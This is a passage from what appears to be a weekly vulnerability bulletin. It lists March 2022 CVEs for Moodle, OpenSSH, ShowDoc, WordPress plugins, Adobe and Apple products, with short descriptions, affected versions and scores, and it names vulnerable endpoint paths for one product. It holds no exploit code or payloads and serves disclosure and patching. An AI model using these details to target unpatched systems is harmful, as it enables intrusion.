| moodle — moodle | ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. | 2022-03-11 | 3.5 | CVE-2021-32475 MISC |
| moodle — moodle | Teachers exporting a forum in CSV format could receive a CSV of forums from all courses in some circumstances. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 are affected. | 2022-03-11 | 2.6 | CVE-2021-32472 MISC |
| openbsd — openssh | ** DISPUTED ** An issue was discovered in OpenSSH before 8.9. If a client is using public-key authentication with agent forwarding but without -oLogLevel=verbose, and an attacker has silently modified the server to support the None authentication option, then the user cannot determine whether FIDO authentication is going to confirm that the user wishes to connect to that server, or that the user wishes to allow that server to connect to a different server on the user’s behalf. NOTE: the vendor’s position is “this is not an authentication bypass, since nothing is being bypassed.” | 2022-03-13 | 2.6 | CVE-2021-36368 MISC MISC CONFIRM MISC |
| orchardcore — orchardcore | Cross-site Scripting (XSS) – Reflected in GitHub repository orchardcms/orchardcore prior to 1.3.0. | 2022-03-11 | 3.5 | CVE-2022-0822 CONFIRM MISC |
| patreon — patreon_wordpress | The Patreon WordPress plugin before 1.8.2 does not sanitise and escape the field “Custom Patreon Page name”, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | 3.5 | CVE-2021-25026 MISC CONFIRM |
| ponton — x/p_messenger | An issue was discovered in PONTON X/P Messenger before 3.11.2. Several functions are vulnerable to reflected XSS, as demonstrated by private/index.jsp?partners/ShowNonLocalPartners.do?localID= or private/index.jsp or private/index.jsp?database/databaseTab.jsp or private/index.jsp?activation/activationMainTab.jsp or private/index.jsp?communication/serverTab.jsp or private/index.jsp?emailNotification/notificationTab.jsp. | 2022-03-13 | 3.5 | CVE-2021-45889 MISC MISC |
| ponton — x/p_messenger | An issue was discovered in PONTON X/P Messenger before 3.11.2. The navigation tree that is shown on the left side of every page of the web application is vulnerable to XSS: it allows injection of JavaScript into its nodes. Creating such nodes is only possible for users who have the role Configuration Administrator or Administrator. | 2022-03-13 | 3.5 | CVE-2021-45888 MISC MISC |
| showdoc — showdoc | Cross-site Scripting (XSS) – Stored in GitHub repository star7th/showdoc prior to 2.10.2. | 2022-03-12 | 3.5 | CVE-2022-0880 MISC CONFIRM |
| showdoc — showdoc | Stored XSS viva cshtm file upload in GitHub repository star7th/showdoc prior to v2.10.4. | 2022-03-14 | 3.5 | CVE-2022-0946 CONFIRM MISC |
| showdoc — showdoc | Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4. | 2022-03-14 | 3.5 | CVE-2022-0941 CONFIRM MISC |
| showdoc — showdoc | Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4. | 2022-03-14 | 3.5 | CVE-2022-0940 MISC CONFIRM |
| showdoc — showdoc | Stored XSS via file upload in GitHub repository star7th/showdoc prior to v2.10.4. | 2022-03-14 | 3.5 | CVE-2022-0938 CONFIRM MISC |
| showdoc — showdoc | Stored xss in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-14 | 3.5 | CVE-2022-0937 MISC CONFIRM |
| smartertools — smartertrack | Stored XSS in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. | 2022-03-14 | 3.5 | CVE-2022-24386 CONFIRM CONFIRM |
| thememove — insight_core | The Insight Core WordPress plugin through 1.0 does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks | 2022-03-14 | 3.5 | CVE-2021-24950 MISC |
| tribalsystems — zenario | Zenario CMS 9.0.54156 is vulnerable to Cross Site Scripting (XSS) via upload file to *.SVG. An attacker can send malicious files to victims and steals victim’s cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS. | 2022-03-14 | 3.5 | CVE-2021-41952 MISC |
| viitorcloud — add_subtitle | The Add Subtitle WordPress plugin through 1.1.0 does not sanitise or escape the sub-title field (available only with classic editor) when output in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks | 2022-03-14 | 3.5 | CVE-2021-24897 MISC |
| webbigt — cybersoldier | The Cybersoldier WordPress plugin before 1.7.0 does not sanitise and escape the URL settings before outputting it in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | 3.5 | CVE-2021-24895 MISC |
| yokogawa — centum_cs_3000_firmware | The following Yokogawa Electric products contain insecure DLL loading issues. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. | 2022-03-11 | 3.7 | CVE-2022-23401 CONFIRM |
Severity Not Yet Assigned
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| 389_directory_server — 389_directory_server |
A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing. | 2022-03-16 | not yet calculated | CVE-2022-0918 MISC MISC |
| accelerated_mobile_pages — accelerated_mobile_pages | Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31). | 2022-03-18 | not yet calculated | CVE-2021-23150 CONFIRM CONFIRM |
| accelerated_mobile_pages — accelerated_mobile_pages | Multiple Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) vulnerabilities discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.32). | 2022-03-18 | not yet calculated | CVE-2021-23209 CONFIRM CONFIRM |
| accesslog — accesslog |
All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package’s exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on. | 2022-03-17 | not yet calculated | CVE-2022-25760 MISC MISC |
| admidio — admidio |
Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9. | 2022-03-19 | not yet calculated | CVE-2022-0991 MISC CONFIRM |
| adobe — acrobat_reader_dc | Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. | 2022-03-18 | not yet calculated | CVE-2022-24092 MISC |
| adobe — acrobat_reader_dc |
Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. | 2022-03-18 | not yet calculated | CVE-2022-24091 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40740 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40737 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40738 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40739 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40735 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40741 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40742 MISC |
| adobe — audition | Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40736 MISC |
| adobe — audition |
Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a SVG file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40734 MISC |
| adobe — bridge | Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-42729 MISC |
| adobe — bridge | Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious PSD file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-42730 MISC |
| adobe — bridge | Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-42720 MISC |
| adobe — bridge | Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-42722 MISC |
| adobe — bridge | Adobe Bridge 11.1.1 (and earlier) is affected by a stack overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Bridge. | 2022-03-16 | not yet calculated | CVE-2021-42728 MISC |
| adobe — bridge | Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-42724 MISC |
| adobe — bridge |
Adobe Bridge version 11.1.1 (and earlier) is affected by a double free vulnerability when parsing a crafted DCM file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. | 2022-03-16 | not yet calculated | CVE-2021-42533 MISC |
| adobe — bridge |
Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .jpe file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-42719 MISC |
| adobe — bridge |
Adobe Bridge version 11.1.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40750 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40769 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40768 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40767 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40766 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40765 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40764 MISC |
| adobe — character_animator | Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40763 MISC |
| adobe — character_animator |
Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40762 MISC |
| adobe — media_encoder | Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40782 MISC |
| adobe — media_encoder | Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40781 MISC |
| adobe — media_encoder | Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40780 MISC |
| adobe — media_encoder | Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40779 MISC |
| adobe — media_encoder | Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40778 MISC |
| adobe — media_encoder |
Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40777 MISC |
| adobe — premiere_elements | Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40787 MISC |
| adobe — premiere_elements | Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40786 MISC |
| adobe — premiere_elements | Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40788 MISC |
| adobe — premiere_elements | Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40789 MISC |
| adobe — premiere_elements | Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-42527 MISC |
| adobe — premiere_elements |
Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40785 MISC |
| adobe — premiere_elements |
Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-42526 MISC |
| adobe — premiere_pro | Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40793 MISC |
| adobe — premiere_pro | Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-40796 MISC |
| adobe — premiere_pro | Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-42264 MISC |
| adobe — premiere_pro | Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40792 MISC |
| adobe — premiere_pro |
Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-40794 MISC |
| adobe — premiere_pro |
Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2022-03-16 | not yet calculated | CVE-2021-42263 MISC |
| advanced_product_labels_for_woocommerce — advanced_product_labels_for_woocommerce |
The Advanced Product Labels for WooCommerce WordPress plugin before 1.2.3.7 does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action’s response, leading to a Reflected Cross-Site Scripting | 2022-03-14 | not yet calculated | CVE-2022-0399 CONFIRM MISC |
| anaconda — anaconda3 |
Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.) | 2022-03-17 | not yet calculated | CVE-2022-26526 MISC MISC MISC |
| apache — cloudstack |
Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack. | 2022-03-15 | not yet calculated | CVE-2022-26779 MISC MISC MLIST |
| apple — ios_and_ipados |
A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 15.2.1 and iPadOS 15.2.1. Processing a maliciously crafted HomeKit accessory name may cause a denial of service. | 2022-03-18 | not yet calculated | CVE-2022-22588 MISC |
| apple — macos_monterey |
A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user’s contacts. | 2022-03-18 | not yet calculated | CVE-2022-22644 MISC |
| apple — macos_monterey |
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22591 MISC |
| apple — macos_monterey |
Multiple issues were addressed by updating to curl version 7.79.1. This issue is fixed in macOS Monterey 12.3. Multiple issues in curl. | 2022-03-18 | not yet calculated | CVE-2022-22623 MISC |
| apple — macos_monterey |
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22586 MISC |
| apple — macos_monterey |
This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window. | 2022-03-18 | not yet calculated | CVE-2022-22647 MISC MISC MISC |
| apple — macos_monterey |
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. | 2022-03-18 | not yet calculated | CVE-2022-22651 MISC |
| apple — macos_monterey |
This issue was addressed with a new entitlement. This issue is fixed in macOS Monterey 12.3. An app may be able to spoof system notifications and UI. | 2022-03-18 | not yet calculated | CVE-2022-22660 MISC |
| apple — macos_monterey |
A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges. | 2022-03-18 | not yet calculated | CVE-2022-22665 MISC |
| apple — macos_monterey |
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22669 MISC |
| apple — multiple_products | The issue was addressed with additional permissions checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to read other applications’ settings. | 2022-03-18 | not yet calculated | CVE-2022-22609 MISC MISC MISC MISC |
| apple — multiple_products | A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An attacker in a privileged network position may be able to leak sensitive user information. | 2022-03-18 | not yet calculated | CVE-2022-22659 MISC |
| apple — multiple_products | A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22661 MISC MISC MISC |
| apple — multiple_products | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22664 MISC MISC MISC |
| apple — multiple_products | A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption. | 2022-03-18 | not yet calculated | CVE-2022-22666 MISC MISC MISC |
| apple — multiple_products | A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22667 MISC |
| apple — multiple_products | An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. A malicious application may be able to identify what other applications a user has installed. | 2022-03-18 | not yet calculated | CVE-2022-22670 MISC MISC MISC |
| apple — multiple_products | An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen. | 2022-03-18 | not yet calculated | CVE-2022-22671 MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A user may send audio and video in a FaceTime call without knowing that they have done so. | 2022-03-18 | not yet calculated | CVE-2022-22643 MISC MISC |
| apple — multiple_products | The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences. | 2022-03-18 | not yet calculated | CVE-2022-22600 MISC MISC MISC MISC |
| apple — multiple_products | A user interface issue was addressed. This issue is fixed in watchOS 8.5, Safari 15.4. Visiting a malicious website may lead to address bar spoofing. | 2022-03-18 | not yet calculated | CVE-2022-22654 MISC MISC |
| apple — multiple_products | Description: A permissions issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen. | 2022-03-18 | not yet calculated | CVE-2022-22599 MISC MISC MISC MISC |
| apple — multiple_products | An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 15.4 and iPadOS 15.4. An app may be able to learn information about the current camera view before being granted camera access. | 2022-03-18 | not yet calculated | CVE-2022-22598 MISC |
| apple — multiple_products | A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22597 MISC MISC MISC |
| apple — multiple_products | A memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22596 MISC MISC |
| apple — multiple_products | A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information. | 2022-03-18 | not yet calculated | CVE-2022-22594 MISC MISC MISC MISC MISC |
| apple — multiple_products | A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. A malicious application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22593 MISC MISC MISC MISC MISC MISC |
| apple — multiple_products | A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. | 2022-03-18 | not yet calculated | CVE-2022-22592 MISC MISC MISC MISC MISC |
| apple — multiple_products | A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22590 MISC MISC MISC MISC MISC |
| apple — multiple_products | A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.. | 2022-03-18 | not yet calculated | CVE-2022-22587 MISC MISC MISC |
| apple — multiple_products | An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access a user’s files. | 2022-03-18 | not yet calculated | CVE-2022-22585 MISC MISC MISC MISC MISC |
